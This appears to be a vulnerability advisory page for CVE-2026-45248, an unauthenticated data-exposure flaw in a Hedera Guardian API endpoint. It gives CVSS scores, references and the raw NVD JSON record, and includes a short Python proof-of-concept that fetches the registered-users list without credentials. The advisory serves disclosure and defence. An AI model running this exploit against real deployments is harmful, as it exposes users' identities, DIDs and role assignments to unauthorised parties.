CVE-2026-45248

Description

Hedera Guardian through 3.5.1 contains an authentication bypass vulnerability in the GET /api/v1/demo/registered-users endpoint that allows unauthenticated attackers to retrieve sensitive user information. Attackers can access the endpoint without providing authentication credentials to obtain usernames, Hedera DIDs, parent registry DIDs, system roles, and policy role assignments for all registered users in the system.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Hedera Guardian <= 3.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-45248
    Attempts to retrieve sensitive user info from the unauthenticated endpoint.
    """
    endpoint = "/api/v1/demo/registered-users"
    full_url = f"{target_url}{endpoint}"
    
    try:
        # Send request without authentication headers
        response = requests.get(full_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Vulnerability confirmed! Sensitive data retrieved:")
            print(response.text)
        else:
            print(f"[-] Target returned status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://localhost:8080"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45248
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45248
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45248/
[4] VulDB https://vuldb.com/cve/CVE-2026-45248
[5] https://github.com/hashgraph/guardian/pull/6076
[6] https://www.vulncheck.com/advisories/hedera-guardian-authentication-bypass-information-disclosure

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45248", "sourceIdentifier": "[email protected]", "published": "2026-05-14T22:16:45.000", "lastModified": "2026-05-14T22:16:45.000", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hedera Guardian through 3.5.1 contains an authentication bypass vulnerability in the GET /api/v1/demo/registered-users endpoint that allows unauthenticated attackers to retrieve sensitive user information. Attackers can access the endpoint without providing authentication credentials to obtain usernames, Hedera DIDs, parent registry DIDs, system roles, and policy role assignments for all registered users in the system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/hashgraph/guardian/pull/6076", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hedera-guardian-authentication-bypass-information-disclosure", "source": "[email protected]"}]}}